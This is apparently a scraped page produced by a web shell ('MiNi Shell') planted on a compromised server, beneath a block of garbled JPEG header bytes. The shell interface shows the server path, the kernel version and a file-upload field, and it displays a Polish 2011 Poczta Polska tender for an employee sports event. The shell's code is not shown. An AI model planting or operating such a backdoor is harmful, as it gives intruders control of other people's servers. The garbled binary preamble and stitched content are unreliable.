JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110308/39020-N-2011.html

<p class="kh_header"><b>Poznań: Organizacja i przeprowadzenie XXXIX Spartakiady Pracowników Poczty Polskiej S.A. Regionu Poznańskiego</b><br>
<b>Numer ogłoszenia: 39020 - 2011; data zamieszczenia: 08.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> "Poczta Polska Spółka Akcyjna"  ul. Rakowiecka 26, 00-940 Warszawa, Centrum Infrastruktury Oddział Regionalny w Poznaniu , ul. Głogowska 17, 60-943 Poznań, woj. wielkopolskie, tel. 0-61/8697011, faks 0-61/8697134.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.poczta-polska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizacja i przeprowadzenie XXXIX Spartakiady Pracowników Poczty Polskiej S.A. Regionu Poznańskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie XXXIX Spartakiady Pracowników Poczty Polskiej SA Regionu Poznańskiego
1)Termin: druga połowa maja 2011, weekend od piątku ok. godz.16.00 do niedzieli ok. godz. 16.00
2)Miejsce: obszar Wielkopolski, miejscowość atrakcyjna pod względem turystycznym (w otoczeniu jeziora, zieleni itd.)
3)Ilość uczestników: ok. 430 osób
4)Baza noclegowa, żywieniowa i sportowa w jednym miejscu lub bezpośrednim sąsiedztwie (dopuszczalna odległość do 500 m)
a)Noclegi - w pokojach 1,2,lub 3- osobowych bądź w domkach max. 6- osobowych, wszystkie pokoje oraz domki o podobnym standardzie z łazienką, wc, niezbędnym umeblowaniem i pościelą.
b)Wyżywienie - 2 x śniadanie (ciepłe danie + zimne zakąski), 2 x obiad (posiłek dwudaniowy; zupa (nieporcjowana) + drugie danie + napój), 2 x kolacja (ciepłe danie + zimne zakąski), dodatkowo ciepły posiłek oraz napój (kawa lub herbata) podczas spotkań integracyjnych w piątek i sobotę.
c)Baza sportowa- wymagana: 
- Bieżnia lekkoatletyczna o nawierzchni syntetycznej
- Profesjonalne boiska do gry w piłkę nożną - zgodne z wytycznymi PZPN (nawierzchnia trawiasta- sztuczna lub naturalna)
- Profesjonalne boiska do gry w piłkę siatkową- zgodne z wytycznymi PZPS (nawierzchnia syntetyczna)
- Skocznia do skoku w dal z rozbiegiem o nawierzchni syntetycznej
- Boiska do gry w tenisa ziemnego 
- Kryta pływalnia z min. trzema torami
- Hala do gry w tenisa stołowego
- Sala do gry w darta wraz z wymaganym sprzętem, zgodnie z wytycznymi PFD
- Stanowiska strzelnicze (łuk i wiatrówka)
- Trasa w terenie do przeprowadzenia biegów przełajowych
- Teren zielony pozwalający na przeprowadzenie konkurencji rekreacyjnych
d) Baza sportowa- dodatkowa (nie obowiązkowa):
- Boiska do gry w koszykówkę o nawierzchni syntetycznej- zgodne z wytycznymi PZKosz
- Ścianka wspinaczkowa 
5) Przeprowadzenie Spartakiady oraz zapewnienie następujących konkurencji dla 10 drużyn 
- Drużyna Rejon - Leszno 
- Drużyna Rejon - Zielona Góra 
- Drużyna Rejon - Gorzów Wlkp. 
- Drużyna Rejon - Piła 
- Drużyna Rejon - Konin 
- Drużyna Rejon - Kalisz
- Drużyna Rejon - Województwo 
- Drużyna Rejon Poznań - Miasto 
- Drużyna WER 
- Drużyna Region - Poznań 
a) Konkurencje obowiązkowe: 
- Trójbój lekkoatletyczny kobiet i mężczyzn
- Piłka nożna mężczyzn
- Piłka siatkowa kobiet i mężczyzn 
- Tenis ziemny kobiet i mężczyzn
- Pływanie kobiet i mężczyzn
- Tenis stołowy kobiet i mężczyzn
- Dart kobiet i mężczyzn
- Dwubój strzelecki (strzelanie z wiatrówki i łuku) kobiet i mężczyzn
- Wielobój rekreacyjny kobiet i mężczyzn
b) Konkurencje dodatkowe:
- koszykówka kobiet i mężczyzn
- wspinaczka skałkowa kobiet i mężczyzn (z asekuracją)
- inne zespołowe konkurencje rekreacyjne
6) Zorganizowanie transportu poszczególnych drużyn z miast początkowych do miejsca imprezy według podanego poniżej planu, autokarami w pełni sprawnymi technicznie, zapewniającymi bezpieczeństwo przewożonych osób:
a) Poznań- Miejsce imprezy- Poznań - 3 autokary
b) Gorzów Wlkp.- Miejsce imprezy- Gorzów Wlkp. - 1 autokar
c) Konin- Miejsce imprezy- Konin - 1 autokar
d) Leszno- Miejsce imprezy- Leszno - 1 autokar
e) Piła- Miejsce imprezy- Piła - 1 autokar
f) Zielona Góra- Miejsce imprezy- Zielona Góra - 1 autokar
g) Kalisz- Miejsce imprezy- Kalisz - 1 autokar
7) Organizacja i przeprowadzenie dwóch imprez- spotkań integracyjnych w piątek i sobotę wieczorem, podczas imprez oprawa muzyczna, DJ lub orkiestra, nagłośnienie, oświetlenie, zapewnienie dodatkowych atrakcji.
8) Kontrola, koordynacja i kompleksowa obsługa Spartakiady, w tym m.in.:
a) Zapewnienie profesjonalnej obsługi sędziowskiej przez sędziów zrzeszonych w Związkach Sportowych dla każdej z przeprowadzanych obowiązkowo konkurencji.
b) Zapewnienie sprzętów do przeprowadzenia w/w konkurencji (piłki, fotokomórki, stopery, rakiety do tenisa, itp.).
c) Zapewnienie zawodowej opieki medycznej przez cały czas trwania imprezy; jeśli odległość od miejsca imprezy do najbliższego szpitala będzie większa niż 15 km, wykonawca powinien zapewnić ambulans na miejscu imprezy przez cały czas jej trwania. 
d) Ubezpieczenie wszystkich uczestników imprezy od momentu wyjazdu z miejsca zamieszkania do momentu powrotu.
e) Zakup dodatkowych napojów dla zawodników; 6 butelek 0,5 l wody mineralnej na osobę 
(w tym 4x woda niegazowana, 2x woda gazowana).
f) Zakup pucharów i dyplomów dla trzech zwycięskich drużyn w klasyfikacji generalnej oraz medali i dyplomów indywidualnych dla trzech najlepszych uczestników w każdej z konkurencji.
(z uwzględnieniem logo Poczty Polskiej oraz nazwy imprezy).
g) Zapewnienie nagłośnienia, mikrofonów, oprawy muzycznej, konferansjera, podium, tablic miast, identyfikatorów dla uczestników, planów spartakiady oraz mapek terenu dla uczestników, talonów konsumpcyjnych).
h) Punkt informacyjny, udzielający niezbędnych wskazówek uczestnikom, zajmujący się dystrybucją talonów konsumpcyjnych, wody dla zawodników, planów imprezy, mapek i identyfikatorów.
i) Zapewnienie tablicy wyników aktualizowanej na bieżąco.
j) Pomoc przy zakwaterowaniu.
k) Odprawa drużyn.
l) Czuwanie nad prawidłowym przebiegiem konkurencji sportowych według określonego wcześniej planu.
m) Przeprowadzenie oficjalnego otwarcia i zamknięcia imprezy z dekoracją zwycięzców na podium..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 92.00.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości 5 000,00 zł (słownie: pięć tysięcy złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu dokonywania oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy, spełniają warunki dotyczące posiadania wiedzy i doświadczenia; tj. wykażą się zrealizowaniem, co najmniej 2 imprez o charakterze sportowo - rekreacyjnym dla minimum 200 uczestników o wartości każdej imprezy nie mniejszej niż 50 000,00 zł. brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy, spełniają warunki dotyczące dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, tj. dysponują:
1) ośrodkiem z bazą noclegową oraz żywieniową dla minimum 430 osób 
2) bazą sportową posiadającą co najmniej:
- Bieżnię lekkoatletyczną o nawierzchni syntetycznej o długości 400 m z minimum 6 torami
- Profesjonalne boiska do gry w piłkę nożną - zgodne z wytycznymi PZPN (nawierzchnia trawiasta- sztuczna lub naturalna)
- Profesjonalne boiska do gry w piłkę siatkową - zgodne z wytycznymi PZPS (nawierzchnia syntetyczna)
- Skocznię do skoku w dal z rozbiegiem o nawierzchni syntetycznej
- Boiska do gry w tenisa ziemnego zgodne z wytycznymi PZT
- Krytą pływalnię o długości minimum 25 m z co najmniej 6 torami
- Halę do gry w tenisa stołowego z miejscem minimum na 3 stoły
- Salę do gry w darta wraz z wymaganym sprzętem, zgodnie z wytycznymi PFD
- Stanowiska strzelnicze (łuk i wiatrówka)
- Teren zielony (trawiasty) pozwalający na przeprowadzenie konkurencji rekreacyjnych
3)	dziewięcioma autokarami, z których każdy posiada minimum 40 miejsc siedzących</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu dokonywania oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje sposobu dokonywania oceny spełnienia tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.poczta-polska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Poczta Polska Spółka
Akcyjna Centrum Infrastruktury Oddział Regionalny w Poznaniu Dział Zamówień Publicznych ul.
Głogowska 17, 60-943 Poznań pok. nr 129.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.03.2011 godzina 09:45, miejsce: Poczta Polska Spółka Akcyjna
Centrum Infrastruktury Oddział Regionalny w Poznaniu
Dział Zamówień Publicznych 
ul. Głogowska 17, 60-943 Poznań pok. nr 129.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com